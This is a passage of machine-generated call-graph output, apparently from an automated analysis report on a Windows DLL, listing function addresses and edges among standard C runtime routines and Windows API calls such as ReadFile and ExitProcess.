6b923bd2 __DllMainCRTStartup@12 39 API calls 15179->15180 15181 6b9237ac 15180->15181 15181->15165 15184 6b9234e1 __DllMainCRTStartup@12 15182->15184 15183 6b923525 __DllMainCRTStartup@12 15183->14750 15184->15183 15185 6b92377a __DllMainCRTStartup@12 39 API calls 15184->15185 15185->15183 15187 6b9232aa __DllMainCRTStartup@12 15186->15187 15190 6b92359b 15187->15190 15189 6b9232be 15189->14486 15191 6b9235f4 15190->15191 15193 6b9235af __DllMainCRTStartup@12 15190->15193 15194 6b923ae0 15191->15194 15193->15189 15195 6b923c50 __DllMainCRTStartup@12 5 API calls 15194->15195 15196 6b923afb 15195->15196 15197 6b923b05 15196->15197 15198 6b92142c __DllMainCRTStartup@12 40 API calls 15196->15198 15199 6b923c2b __DllMainCRTStartup@12 5 API calls 15197->15199 15198->15197 15200 6b923b19 __DllMainCRTStartup@12 15199->15200 15201 6b923f56 __DllMainCRTStartup@12 40 API calls 15200->15201 15202 6b923b33 __DllMainCRTStartup@12 15201->15202 15203 6b92377a __DllMainCRTStartup@12 39 API calls 15202->15203 15204 6b923b80 __DllMainCRTStartup@12 15202->15204 15203->15204 15205 6b924ad5 _ValidateLocalCookies 5 API calls 15204->15205 15206 6b923ba8 15205->15206 15206->15193 15208 6b9210df __vfwprintf_l 15207->15208 15245 6b9210a2 15208->15245 15212 6b923421 __DllMainCRTStartup@12 15211->15212 15281 6b9239e9 15212->15281 15215 6b9223ce 15216 6b9223f4 __DllMainCRTStartup@12 15215->15216 15217 6b92240b ExpandEnvironmentStringsW 15216->15217 15218 6b92329b __DllMainCRTStartup@12 40 API calls 15217->15218 15219 6b922421 15218->15219 15220 6b924ad5 _ValidateLocalCookies 5 API calls 15219->15220 15221 6b92242e 15220->15221 15222 6b921654 VariantInit 15221->15222 15222->14772 15223->14775 15224->14777 15225->14781 15226->14783 15227->14785 15228->14787 15229->14789 15292 6b92139b 15230->15292 15232 6b921485 __DllMainCRTStartup@12 15234 6b9214a8 __DllMainCRTStartup@12 15232->15234 15295 6b921543 SysAllocString 15232->15295 15234->14797 15306 6b921522 15235->15306 15246 6b9210b6 __vfwprintf_l 15245->15246 15249 6b92c687 15246->15249 15250 6b92c69b __vfwprintf_l 15249->15250 15251 6b92c6bd 15250->15251 15253 6b92c6e4 15250->15253 15252 6b92de7c __vfwprintf_l 29 API calls 15251->15252 15254 6b92c6d8 15252->15254 15258 6b9281ef 15253->15258 15256 6b927d4e __vfwprintf_l 39 API calls 15254->15256 15257 6b9210c0 76C9D120 15256->15257 15257->14765 15259 6b9281fb __FrameHandler3::FrameUnwindToState 15258->15259 15266 6b92cc7d RtlEnterCriticalSection 15259->15266 15261 6b928209 15267 6b92a16d 15261->15267 15266->15261 15268 6b9313fe __vfwprintf_l 40 API calls 15267->15268 15269 6b92a194 __vfwprintf_l 15268->15269 15270 6b92a46b __vfwprintf_l 44 API calls 15269->15270 15271 6b92a1db 15270->15271 15272 6b92a12f __vfwprintf_l 14 API calls 15271->15272 15273 6b92a1e8 15272->15273 15274 6b9314a9 __vfwprintf_l 64 API calls 15273->15274 15275 6b92a1f5 15274->15275 15276 6b924ad5 _ValidateLocalCookies 5 API calls 15275->15276 15277 6b928216 15276->15277 15278 6b92823e 15277->15278 15279 6b92cc91 __fread_nolock RtlLeaveCriticalSection 15278->15279 15280 6b928227 15279->15280 15280->15254 15282 6b923c50 __DllMainCRTStartup@12 5 API calls 15281->15282 15283 6b923a0a 15282->15283 15284 6b92142c __DllMainCRTStartup@12 40 API calls 15283->15284 15285 6b923a14 __DllMainCRTStartup@12 15283->15285 15284->15285 15286 6b923c2b __DllMainCRTStartup@12 5 API calls 15285->15286 15291 6b923a3a __DllMainCRTStartup@12 15285->15291 15287 6b923a7c 15286->15287 15288 6b923f56 __DllMainCRTStartup@12 40 API calls 15287->15288 15288->15291 15289 6b924ad5 _ValidateLocalCookies 5 API calls 15290 6b922500 15289->15290 15290->15215 15291->15289 15297 6b924ae8 15292->15297 15296 6b921571 __DllMainCRTStartup@12 15295->15296 15296->15234 15299 6b924aed ___std_exception_copy 15297->15299 15298 6b9213a6 15298->15232 15299->15298 15300 6b92df8f _unexpected 2 API calls 15299->15300 15301 6b924b09 __DllMainCRTStartup@12 15299->15301 15300->15299 15302 6b92501f __DllMainCRTStartup@12 15301->15302 15304 6b926486 std::_Xinvalid_argument RaiseException 15301->15304 15303 6b926486 std::_Xinvalid_argument RaiseException 15302->15303 15305 6b92503c 15303->15305 15304->15302 15307 6b9214f6 15306->15307 15308 6b921531 15306->15308 15307->14803 15307->14804 15310 6b921588 15308->15310 15311 6b9215ba 15310->15311 15312 6b9215a4 15310->15312 15311->15307 15312->15311 15314 6b9215c8 15312->15314 15317 6b9215fe 15314->15317 15316 6b9215d7 __DllMainCRTStartup@12 15316->15311 15318 6b92160f __DllMainCRTStartup@12 SysFreeString 15317->15318 15319 6b92160d 15318->15319 15319->15316 15321 6b92cd68 15320->15321 15322 6b92cd79 15320->15322 15323 6b930431 __dosmaperr 14 API calls 15321->15323 15363 6b92cca5 15322->15363 15325 6b92cd6d 15323->15325 15326 6b92def9 ___std_exception_copy 39 API calls 15325->15326 15328 6b922032 15326->15328 15328->15052 15330 6b92d1e0 15328->15330 15329 6b930431 __dosmaperr 14 API calls 15329->15328 15331 6b92d1f3 __vfwprintf_l 15330->15331 15414 6b92cf71 15331->15414 15334 6b927d4e __vfwprintf_l 39 API calls 15335 6b92204b 15334->15335 15336 6b9281bf 15335->15336 15337 6b9281d2 __vfwprintf_l 15336->15337 15482 6b927ab3 15337->15482 15340 6b927d4e __vfwprintf_l 39 API calls 15341 6b922056 15340->15341 15342 6b92cec7 15341->15342 15343 6b92ceda __vfwprintf_l 15342->15343 15536 6b92cda2 15343->15536 15345 6b92cee6 15346 6b927d4e __vfwprintf_l 39 API calls 15345->15346 15347 6b922062 15346->15347 15347->15045 15585 6b92dbb6 15348->15585 15352 6b92cb21 __vfwprintf_l __DllMainCRTStartup@12 15351->15352 15736 6b92c7ee 15352->15736 15354 6b92cb42 15355 6b927d4e __vfwprintf_l 39 API calls 15354->15355 15356 6b92211b 15355->15356 15356->15051 15358 6b92d4f2 __vfwprintf_l 15357->15358 15838 6b92d2c1 15358->15838 15365 6b92ccb1 __FrameHandler3::FrameUnwindToState 15363->15365 15364 6b92ccb8 15366 6b930431 __dosmaperr 14 API calls 15364->15366 15365->15364 15367 6b92ccda 15365->15367 15368 6b92ccbd 15366->15368 15369 6b92ccdf 15367->15369 15370 6b92ccec 15367->15370 15371 6b92def9 ___std_exception_copy 39 API calls 15368->15371 15373 6b930431 __dosmaperr 14 API calls 15369->15373 15380 6b931e6f 15370->15380 15372 6b92ccc8 15371->15372 15372->15328 15372->15329 15373->15372 15376 6b92ccfb 15378 6b930431 __dosmaperr 14 API calls 15376->15378 15377 6b92cd08 __DllMainCRTStartup@12 15388 6b92cd44 15377->15388 15378->15372 15381 6b931e7b __FrameHandler3::FrameUnwindToState 15380->15381 15392 6b93351f RtlEnterCriticalSection 15381->15392 15383 6b931e89 15393 6b931f13 15383->15393 15389 6b92cd48 __DllMainCRTStartup@12 15388->15389 15413 6b92cc91 RtlLeaveCriticalSection 15389->15413 15391 6b92cd59 15391->15372 15392->15383 15400 6b931f36 15393->15400 15394 6b931f8e 15395 6b931658 _unexpected 14 API calls 15394->15395 15396 6b931f97 15395->15396 15398 6b930444 __freea 14 API calls 15396->15398 15399 6b931fa0 15398->15399 15401 6b9319b1 __wsopen_s 6 API calls 15399->15401 15405 6b931e96 15399->15405 15400->15394 15400->15400 15400->15405 15409 6b92cc7d RtlEnterCriticalSection 15400->15409 15410 6b92cc91 RtlLeaveCriticalSection 15400->15410 15402 6b931fbf 15401->15402 15411 6b92cc7d RtlEnterCriticalSection 15402->15411 15406 6b931ecf 15405->15406 15412 6b933567 RtlLeaveCriticalSection 15406->15412 15408 6b92ccf5 15408->15376 15408->15377 15409->15400 15410->15400 15411->15405 15412->15408 15413->15391 15416 6b92cf7d __FrameHandler3::FrameUnwindToState 15414->15416 15415 6b92cf83 15417 6b92de7c __vfwprintf_l 29 API calls 15415->15417 15416->15415 15418 6b92cfc6 15416->15418 15419 6b92cf9e 15417->15419 15425 6b92cc7d RtlEnterCriticalSection 15418->15425 15419->15334 15421 6b92cfd2 15426 6b92d0f4 15421->15426 15423 6b92cfe8 15435 6b92d011 15423->15435 15425->15421 15427 6b92d107 15426->15427 15428 6b92d11a 15426->15428 15427->15423 15438 6b92d01b 15428->15438 15431 6b92d13d __DllMainCRTStartup@12 15434 6b92d1cb 15431->15434 15442 6b931d58 15431->15442 15434->15423 15481 6b92cc91 RtlLeaveCriticalSection 15435->15481 15437 6b92d019 15437->15419 15439 6b92d02c 15438->15439 15440 6b92d084 __DllMainCRTStartup@12 15438->15440 15439->15440 15451 6b92f0cf 15439->15451 15440->15431 15443 6b931d71 15442->15443 15447 6b92d16b 15442->15447 15443->15447 15457 6b92eea2 15443->15457 15445 6b931d8d 15464 6b932dbf 15445->15464 15448 6b92f10f 15447->15448 15475 6b92efee 15448->15475 15450 6b92f128 15450->15434 15452 6b92f0e3 __vfwprintf_l 15451->15452 15453 6b92efee __fread_nolock 41 API calls 15452->15453 15454 6b92f0f8 15453->15454 15455 6b927d4e __vfwprintf_l 39 API calls 15454->15455 15456 6b92f107 15455->15456 15456->15440 15458 6b92eec3 15457->15458 15459 6b92eeae 15457->15459 15458->15445 15460 6b930431 __dosmaperr 14 API calls 15459->15460 15461 6b92eeb3 15460->15461 15462 6b92def9 ___std_exception_copy 39 API calls 15461->15462 15463 6b92eebe 15462->15463 15463->15445 15466 6b932dcb __FrameHandler3::FrameUnwindToState 15464->15466 15465 6b932dd3 15465->15447 15466->15465 15467 6b932e0c 15466->15467 15469 6b932e52 15466->15469 15468 6b92de7c __vfwprintf_l 29 API calls 15467->15468 15468->15465 15470 6b935062 __wsopen_s RtlEnterCriticalSection 15469->15470 15472 6b932e58 15470->15472 15471 6b932e76 15474 6b932ec8 __wsopen_s RtlLeaveCriticalSection 15471->15474 15472->15471 15473 6b932ed0 __wsopen_s 62 API calls 15472->15473 15473->15471 15474->15465 15476 6b9352de __wsopen_s 39 API calls 15475->15476 15477 6b92f000 15476->15477 15478 6b92f01c SetFilePointerEx 15477->15478 15480 6b92f008 __wsopen_s 15477->15480 15479 6b92f034 GetLastError 15478->15479 15478->15480 15479->15480 15480->15450 15481->15437 15483 6b927abf __FrameHandler3::FrameUnwindToState 15482->15483 15484 6b927ac6 15483->15484 15485 6b927ae7 15483->15485 15487 6b92de7c __vfwprintf_l 29 API calls 15484->15487 15493 6b92cc7d RtlEnterCriticalSection 15485->15493 15489 6b927adf 15487->15489 15488 6b927af2 15494 6b927b33 15488->15494 15489->15340 15493->15488 15500 6b927b65 15494->15500 15496 6b927b01 15497 6b927b29 15496->15497 15535 6b92cc91 RtlLeaveCriticalSection 15497->15535 15499 6b927b31 15499->15489 15501 6b927b74 15500->15501 15502 6b927b9c 15500->15502 15503 6b92de7c __vfwprintf_l 29 API calls 15501->15503 15504 6b92eea2 __fread_nolock 39 API calls 15502->15504 15512 6b927b8f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15503->15512 15505 6b927ba5 15504->15505 15513 6b92f0b1 15505->15513 15508 6b927c4f 15516 6b927f55 15508->15516 15510 6b927c66 __DllMainCRTStartup@12 15510->15512 15528 6b927d8a 15510->15528 15512->15496 15514 6b92eec9 __DllMainCRTStartup@12 43 API calls 15513->15514 15515 6b927bc3 15514->15515 15515->15508 15515->15510 15515->15512 15517 6b927f64 __wsopen_s 15516->15517 15518 6b92eea2 __fread_nolock 39 API calls 15517->15518 15520 6b927f80 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15518->15520 15519 6b924ad5 _ValidateLocalCookies 5 API calls 15521 6b9280fe 15519->15521 15522 6b92f0b1 __DllMainCRTStartup@12 43 API calls 15520->15522 15527 6b927f8c 15520->15527 15521->15512 15523 6b927fe0 15522->15523 15524 6b928012 ReadFile 15523->15524 15523->15527 15525 6b928039 15524->15525 15524->15527 15526 6b92f0b1 __DllMainCRTStartup@12 43 API calls 15525->15526 15526->15527 15527->15519 15529 6b92eea2 __fread_nolock 39 API calls 15528->15529 15530 6b927d9d 15529->15530 15531 6b92f0b1 __DllMainCRTStartup@12 43 API calls 15530->15531 15534 6b927de7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 15530->15534 15532 6b927e44 15531->15532 15533 6b92f0b1 __DllMainCRTStartup@12 43 API calls 15532->15533 15532->15534 15533->15534 15534->15512 15535->15499 15537 6b92cdae __FrameHandler3::FrameUnwindToState 15536->15537 15538 6b92cddb 15537->15538 15539 6b92cdb8 15537->15539 15541 6b92cdd3 __DllMainCRTStartup@12 15538->15541 15547 6b92cc7d RtlEnterCriticalSection 15538->15547 15540 6b92de7c __vfwprintf_l 29 API calls 15539->15540 15540->15541 15541->15345 15543 6b92cdf9 15548 6b92ce39 15543->15548 15545 6b92ce06 15562 6b92ce31 15545->15562 15547->15543 15549 6b92ce46 15548->15549 15550 6b92ce69 15548->15550 15551 6b92de7c __vfwprintf_l 29 API calls 15549->15551 15552 6b92ce61 __DllMainCRTStartup@12 15550->15552 15553 6b931d58 __vfwprintf_l 64 API calls 15550->15553 15551->15552 15552->15545 15554 6b92ce81 15553->15554 15565 6b931e2f 15554->15565 15557 6b92eea2 __fread_nolock 39 API calls 15558 6b92ce95 15557->15558 15569 6b932473 15558->15569 15561 6b930444 __freea 14 API calls 15561->15552 15584 6b92cc91 RtlLeaveCriticalSection 15562->15584 15564 6b92ce37 15564->15541 15566 6b931e46 15565->15566 15567 6b92ce89 15565->15567 15566->15567 15568 6b930444 __freea 14 API calls 15566->15568 15567->15557 15568->15567 15570 6b92ce9c 15569->15570 15571 6b93249c 15569->15571 15570->15552 15570->15561 15572 6b9324eb 15571->15572 15574 6b9324c3 15571->15574 15573 6b92de7c __vfwprintf_l 29 API calls 15572->15573 15573->15570 15576 6b9323e2 15574->15576 15577 6b9323ee __FrameHandler3::FrameUnwindToState 15576->15577 15578 6b935062 __wsopen_s RtlEnterCriticalSection 15577->15578 15579 6b9323fc 15578->15579 15580 6b93242d 15579->15580 15581 6b932546 __wsopen_s 42 API calls 15579->15581 15582 6b932467 __DllMainCRTStartup@12 RtlLeaveCriticalSection 15580->15582 15581->15580 15583 6b932450 15582->15583 15583->15570 15584->15564 15586 6b92dbc2 __FrameHandler3::FrameUnwindToState 15585->15586 15587 6b92dbd5 __fread_nolock 15586->15587 15588 6b92dc0c 15586->15588 15597 6b92dbb1 15586->15597 15591 6b930431 __dosmaperr 14 API calls 15587->15591 15598 6b92cc7d RtlEnterCriticalSection 15588->15598 15590 6b92dc16 15599 6b92d9c0 15590->15599 15593 6b92dbef 15591->15593 15595 6b92def9 ___std_exception_copy 39 API calls 15593->15595 15595->15597 15597->15048 15598->15590 15603 6b92d9d2 __fread_nolock 15599->15603 15605 6b92d9ef 15599->15605 15600 6b92d9df 15601 6b930431 __dosmaperr 14 API calls 15600->15601 15602 6b92d9e4 15601->15602 15604 6b92def9 ___std_exception_copy 39 API calls 15602->15604 15603->15600 15603->15605 15610 6b92da30 __fread_nolock 15603->15610 15604->15605 15612 6b92dc4b 15605->15612 15606 6b92db5b __fread_nolock 15609 6b930431 __dosmaperr 14 API calls 15606->15609 15608 6b92eea2 __fread_nolock 39 API calls 15608->15610 15609->15602 15610->15605 15610->15606 15610->15608 15615 6b92dc53 15610->15615 15629 6b92fe17 15610->15629 15735 6b92cc91 RtlLeaveCriticalSection 15612->15735 15614 6b92dc51 15614->15597 15616 6b92dc64 15615->15616 15620 6b92dc60 __fread_nolock 15615->15620 15617 6b92dc6b 15616->15617 15621 6b92dc7e __fread_nolock 15616->15621 15618 6b930431 __dosmaperr 14 API calls 15617->15618 15619 6b92dc70 15618->15619 15622 6b92def9 ___std_exception_copy 39 API calls 15619->15622 15620->15610 15621->15620 15623 6b92dcb5 15621->15623 15624 6b92dcac 15621->15624 15622->15620 15623->15620 15627 6b930431 __dosmaperr 14 API calls 15623->15627 15625 6b930431 __dosmaperr 14 API calls 15624->15625 15626 6b92dcb1 15625->15626 15628 6b92def9 ___std_exception_copy 39 API calls 15626->15628 15627->15626 15628->15620 15630 6b92fe41 15629->15630 15631 6b92fe29 15629->15631 15633 6b930183 15630->15633 15638 6b92fe84 15630->15638 15692 6b93041e 15631->15692 15635 6b93041e __dosmaperr 14 API calls 15633->15635 15637 6b930188 15635->15637 15636 6b930431 __dosmaperr 14 API calls 15639 6b92fe36 15636->15639 15640 6b930431 __dosmaperr 14 API calls 15637->15640 15638->15639 15641 6b92fe8f 15638->15641 15646 6b92febf 15638->15646 15639->15610 15642 6b92fe9c 15640->15642 15643 6b93041e __dosmaperr 14 API calls 15641->15643 15647 6b92def9 ___std_exception_copy 39 API calls 15642->15647 15644 6b92fe94 15643->15644 15645 6b930431 __dosmaperr 14 API calls 15644->15645 15645->15642 15648 6b92fed8 15646->15648 15649 6b92ff13 15646->15649 15650 6b92fee5 15646->15650 15647->15639 15648->15650 15682 6b92ff01 15648->15682 15695 6b93047e 15649->15695 15651 6b93041e __dosmaperr 14 API calls 15650->15651 15653 6b92feea 15651->15653 15655 6b930431 __dosmaperr 14 API calls 15653->15655 15658 6b92fef1 15655->15658 15657 6b930444 __freea 14 API calls 15660 6b92ff2d 15657->15660 15661 6b92def9 ___std_exception_copy 39 API calls 15658->15661 15659 6b93005f 15662 6b9300d3 15659->15662 15663 6b930078 GetConsoleMode 15659->15663 15664 6b930444 __freea 14 API calls 15660->15664 15691 6b92fefc __fread_nolock 15661->15691 15665 6b9300d7 ReadFile 15662->15665 15663->15662 15666 6b930089 15663->15666 15667 6b92ff34 15664->15667 15668 6b93014b GetLastError 15665->15668 15669 6b9300ef 15665->15669 15666->15665 15670 6b93008f ReadConsoleW 15666->15670 15671 6b92ff59 15667->15671 15672 6b92ff3e 15667->15672 15673 6b930158 15668->15673 15677 6b9300af 15668->15677 15669->15668 15676 6b9300c8 15669->15676 15675 6b9300a9 GetLastError 15670->15675 15670->15676 15674 6b92f0cf __fread_nolock 41 API calls 15671->15674 15679 6b930431 __dosmaperr 14 API calls 15672->15679 15680 6b930431 __dosmaperr 14 API calls 15673->15680 15674->15682 15675->15677 15686 6b930114 15676->15686 15687 6b93012b 15676->15687 15676->15691 15677->15691 15711 6b9303d7 15677->15711 15678 6b930444 __freea 14 API calls 15678->15639 15684 6b92ff43 15679->15684 15681 6b93015d 15680->15681 15685 6b93041e __dosmaperr 14 API calls 15681->15685 15702 6b935a73 15682->15702 15688 6b93041e __dosmaperr 14 API calls 15684->15688 15685->15691 15716 6b92fb29 15686->15716 15687->15691 15729 6b92f96f 15687->15729 15688->15691 15691->15678 15693 6b92f5e8 __dosmaperr 14 API calls 15692->15693 15694 6b92fe2e 15693->15694 15694->15636 15696 6b9304bc 15695->15696 15701 6b93048c _unexpected 15695->15701 15698 6b930431 __dosmaperr 14 API calls 15696->15698 15697 6b9304a7 RtlAllocateHeap 15699 6b92ff24 15697->15699 15697->15701 15698->15699 15699->15657 15700 6b92df8f _unexpected RtlEnterCriticalSection RtlLeaveCriticalSection 15700->15701 15701->15696 15701->15697 15701->15700 15703 6b935a80 15702->15703 15704 6b935a8d 15702->15704 15705 6b930431 __dosmaperr 14 API calls 15703->15705 15706 6b935a99 15704->15706 15707 6b930431 __dosmaperr 14 API calls 15704->15707 15708 6b935a85 15705->15708 15706->15659 15709 6b935aba 15707->15709 15708->15659 15710 6b92def9 ___std_exception_copy 39 API calls 15709->15710 15710->15708 15712 6b93041e __dosmaperr 14 API calls 15711->15712 15713 6b9303e2 __dosmaperr 15712->15713 15714 6b930431 __dosmaperr 14 API calls 15713->15714 15715 6b9303f5 15714->15715 15715->15691 15717 6b92f822 __fread_nolock 42 API calls 15716->15717 15719 6b92fb40 15717->15719 15718 6b93488b __fread_nolock MultiByteToWideChar 15720 6b92fc3d 15718->15720 15721 6b92fbcb 15719->15721 15722 6b92fbbb 15719->15722 15726 6b92fb71 15719->15726 15727 6b92fb85 15719->15727 15723 6b92fc46 GetLastError 15720->15723 15720->15726 15721->15727 15728 6b92f0cf __fread_nolock 41 API calls 15721->15728 15724 6b930431 __dosmaperr 14 API calls 15722->15724 15725 6b9303d7 __dosmaperr 14 API calls 15723->15725 15724->15726 15725->15726 15726->15691 15727->15718 15728->15727 15730 6b92f9a9 15729->15730 15731 6b92fa3f ReadFile 15730->15731 15732 6b92fa3a 15730->15732 15731->15732 15733 6b92fa5c 15731->15733 15732->15691 15733->15732 15734 6b92f0cf __fread_nolock 41 API calls 15733->15734 15734->15732 15735->15614 15752 6b92c37b 15736->15752 15738 6b92c849 15741 6b92c86e 15738->15741 15743 6b92c320 __vfwprintf_l 39 API calls 15738->15743 15739 6b92c801 15739->15738 15740 6b92c816 15739->15740 15751 6b92c831 __DllMainCRTStartup@12 15739->15751 15742 6b92de7c __vfwprintf_l 29 API calls 15740->15742 15759 6b92cab6 15741->15759 15742->15751 15743->15741 15745 6b92cab6 __DllMainCRTStartup@12 42 API calls 15746 6b92c883 15745->15746 15746->15745 15747 6b92c8ac 15746->15747 15750 6b92c937 __aulldiv __DllMainCRTStartup@12 15747->15750 15766 6b92c2c5 15747->15766 15749 6b92c2c5 __vfwprintf_l 39 API calls 15749->15751 15750->15749 15751->15354 15753 6b92c393 15752->15753 15754 6b92c380 15752->15754 15753->15739 15755 6b930431 __dosmaperr 14 API calls 15754->15755 15756 6b92c385 15755->15756 15757 6b92def9 ___std_exception_copy 39 API calls 15756->15757 15758 6b92c390 15757->15758 15758->15739 15760 6b92cac2 15759->15760 15762 6b92cad8 15759->15762 15772 6b9314e7 15760->15772 15763 6b92cae8 15762->15763 15777 6b93158d 15762->15777 15763->15746 15764 6b92cacd __vfwprintf_l 15764->15746 15767 6b92c2d6 15766->15767 15768 6b92c2ea 15766->15768 15767->15768 15769 6b930431 __dosmaperr 14 API calls 15767->15769 15768->15750 15770 6b92c2df 15769->15770 15771 6b92def9 ___std_exception_copy 39 API calls 15770->15771 15771->15768 15784 6b92f497 GetLastError 15772->15784 15815 6b93150b 15777->15815 15781 6b924ad5 _ValidateLocalCookies 5 API calls 15782 6b931656 15781->15782 15782->15763 15783 6b9315ba 15783->15781 15785 6b92f4b3 15784->15785 15786 6b92f4ad 15784->15786 15788 6b93196f _unexpected 6 API calls 15785->15788 15790 6b92f4b7 SetLastError 15785->15790 15787 6b931930 _unexpected 6 API calls 15786->15787 15787->15785 15789 6b92f4cf 15788->15789 15789->15790 15792 6b931658 _unexpected 14 API calls 15789->15792 15794 6b92f547 15790->15794 15795 6b92f54c 15790->15795 15793 6b92f4e4 15792->15793 15796 6b92f4ec 15793->15796 15797 6b92f4fd 15793->15797 15811 6b9304cc 15794->15811 15798 6b92ed44 __FrameHandler3::FrameUnwindToState 37 API calls 15795->15798 15799 6b93196f _unexpected 6 API calls 15796->15799 15800 6b93196f _unexpected 6 API calls 15797->15800 15801 6b92f551 15798->15801 15802 6b92f4fa 15799->15802 15803 6b92f509 15800->15803 15808 6b930444 __freea 14 API calls 15802->15808 15804 6b92f524 15803->15804 15805 6b92f50d 15803->15805 15806 6b92f299 _unexpected 14 API calls 15804->15806 15807 6b93196f _unexpected 6 API calls 15805->15807 15809 6b92f52f 15806->15809 15807->15802 15808->15790 15810 6b930444 __freea 14 API calls 15809->15810 15810->15790 15812 6b9304df 15811->15812 15814 6b9304f4 15811->15814 15813 6b935611 __vfwprintf_l 39 API calls 15812->15813 15812->15814 15813->15814 15814->15764 15816 6b931529 15815->15816 15822 6b931522 15815->15822 15817 6b92f497 _unexpected 39 API calls 15816->15817 15816->15822 15818 6b93154a 15817->15818 15819 6b9304cc __DllMainCRTStartup@12 39 API calls 15818->15819 15820 6b931560 15819->15820 15821 6b93052a __DllMainCRTStartup@12 39 API calls 15820->15821 15821->15822 15822->15783 15823 6b935952 15822->15823 15824 6b93150b __DllMainCRTStartup@12 39 API calls 15823->15824 15825 6b935972 15824->15825 15826 6b93488b __fread_nolock MultiByteToWideChar 15825->15826 15829 6b93599f 15826->15829 15827 6b935a2e 15830 6b924ad5 _ValidateLocalCookies 5 API calls 15827->15830 15828 6b935a26 15831 6b935a53 __freea 14 API calls 15828->15831 15829->15827 15829->15828 15832 6b93047e __fread_nolock 15 API calls 15829->15832 15834 6b9359c4 __fread_nolock __alloca_probe_16 15829->15834 15833 6b935a51 15830->15833 15831->15827 15832->15834 15833->15783 15834->15828 15835 6b93488b __fread_nolock MultiByteToWideChar 15834->15835 15836 6b935a0d 15835->15836 15836->15828 15837 6b935a14 GetStringTypeW 15836->15837 15837->15828 15886->14496 15888 6b92eb29 __EH_prolog3 15887->15888 15902 6b92e9e8 15888->15902 15890 6b92eb50 __DllMainCRTStartup@12 15890->14341 15892 6b92e333 15891->15892 15893 6b92e344 15891->15893 15919 6b92e3ce GetModuleHandleW 15892->15919 15926 6b92e1d1 15893->15926 15898 6b92e382 15898->13788 15903 6b92e9f4 __FrameHandler3::FrameUnwindToState 15902->15903 15910 6b93351f RtlEnterCriticalSection 15903->15910 15905 6b92ea02 15911 6b92ea43 15905->15911 15910->15905 15912 6b92ea0f 15911->15912 15913 6b92ea62 15911->15913 15915 6b92ea37 15912->15915 15913->15912 15914 6b930444 __freea 14 API calls 15913->15914 15914->15912 15918 6b933567 RtlLeaveCriticalSection 15915->15918 15917 6b92ea20 15917->15890 15918->15917 15920 6b92e338 15919->15920 15920->15893 15921 6b92e429 GetModuleHandleExW 15920->15921 15922 6b92e468 GetProcAddress 15921->15922 15923 6b92e47c 15921->15923 15922->15923 15924 6b92e498 15923->15924 15925 6b92e48f FreeLibrary 15923->15925 15924->15893 15925->15924 15927 6b92e1dd __FrameHandler3::FrameUnwindToState 15926->15927 15941 6b93351f RtlEnterCriticalSection 15927->15941 15929 6b92e1e7 15942 6b92e21e 15929->15942 15931 6b92e1f4 15946 6b92e212 15931->15946 15934 6b92e39d 15950 6b92e410 15934->15950 15936 6b92e3a7 15937 6b92e3bb 15936->15937 15938 6b92e3ab GetCurrentProcess TerminateProcess 15936->15938 15939 6b92e429 __FrameHandler3::FrameUnwindToState 3 API calls 15937->15939 15938->15937 15940 6b92e3c3 ExitProcess 15939->15940 15941->15929 15943 6b92e22a __FrameHandler3::FrameUnwindToState 15942->15943 15944 6b92eb1d __DllMainCRTStartup@12 14 API calls 15943->15944 15945 6b92e28e __FrameHandler3::FrameUnwindToState 15943->15945 15944->15945 15945->15931 15949 6b933567 RtlLeaveCriticalSection 15946->15949 15948 6b92e200 15948->15898 15948->15934 15949->15948 15953 6b9335a3 15950->15953 15952 6b92e415 __FrameHandler3::FrameUnwindToState 15952->15936 15954 6b9335b2 __FrameHandler3::FrameUnwindToState 15953->15954 15955 6b9335bf 15954->15955 15957 6b931853 15954->15957 15955->15952 15958 6b9317ce _unexpected 5 API calls 15957->15958 15959 6b93186f 15958->15959 15959->15955 15961 6b9266ea 15960->15961 15962 6b9250eb 15960->15962 15961->15962 15963 6b92d5ab ___std_exception_copy 14 API calls 15961->15963 15962->13790 15963->15961 15965 6b92ece3 ___scrt_uninitialize_crt 15964->15965 15966 6b92ecd1 15964->15966 15965->14353 15967 6b92ecdf 15966->15967 15969 6b931e26 15966->15969 15967->14353 15972 6b931cb7 15969->15972 15975 6b931c0b 15972->15975 15976 6b931c17 __FrameHandler3::FrameUnwindToState 15975->15976 15983 6b93351f RtlEnterCriticalSection 15976->15983 15978 6b931c8d 15992 6b931cab 15978->15992 15979 6b931c21 ___scrt_uninitialize_crt 15979->15978 15984 6b931b7f 15979->15984 15983->15979 15985 6b931b8b __FrameHandler3::FrameUnwindToState 15984->15985 15995 6b92cc7d RtlEnterCriticalSection 15985->15995 15987 6b931b95 ___scrt_uninitialize_crt 15991 6b931bce 15987->15991 15996 6b931dc1 15987->15996 16009 6b931bff 15991->16009 16037 6b933567 RtlLeaveCriticalSection 15992->16037 15994 6b931c99 15994->15967 15995->15987 15997 6b931dd6 __vfwprintf_l 15996->15997 15998 6b931de8 15997->15998 15999 6b931ddd 15997->15999 16001 6b931d58 __vfwprintf_l 64 API calls 15998->16001 16000 6b931cb7 ___scrt_uninitialize_crt 68 API calls 15999->16000 16002 6b931de3 16000->16002 16003 6b931df2 16001->16003 16004 6b927d4e __vfwprintf_l 39 API calls 16002->16004 16003->16002 16006 6b92eea2 __fread_nolock 39 API calls 16003->16006 16005 6b931e20 16004->16005 16005->15991 16007 6b931e09 16006->16007 16012 6b937a65 16007->16012 16036 6b92cc91 RtlLeaveCriticalSection 16009->16036 16011 6b931bed 16011->15979 16013 6b937a83 16012->16013 16014 6b937a76 16012->16014 16016 6b937acc 16013->16016 16019 6b937aaa 16013->16019 16015 6b930431 __dosmaperr 14 API calls 16014->16015 16018 6b937a7b 16015->16018 16017 6b930431 __dosmaperr 14 API calls 16016->16017 16020 6b937ad1 16017->16020 16018->16002 16023 6b9379c3 16019->16023 16021 6b92def9 ___std_exception_copy 39 API calls 16020->16021 16021->16018 16024 6b9379cf __FrameHandler3::FrameUnwindToState 16023->16024 16025 6b935062 __wsopen_s RtlEnterCriticalSection 16024->16025 16026 6b9379de 16025->16026 16027 6b9352de __wsopen_s 39 API calls 16026->16027 16034 6b937a23 16026->16034 16029 6b937a0a FlushFileBuffers 16027->16029 16028 6b930431 __dosmaperr 14 API calls 16030 6b937a2a 16028->16030 16029->16030 16031 6b937a16 GetLastError 16029->16031 16033 6b937a59 ___scrt_uninitialize_crt RtlLeaveCriticalSection 16030->16033 16032 6b93041e __dosmaperr 14 API calls 16031->16032 16032->16034 16035 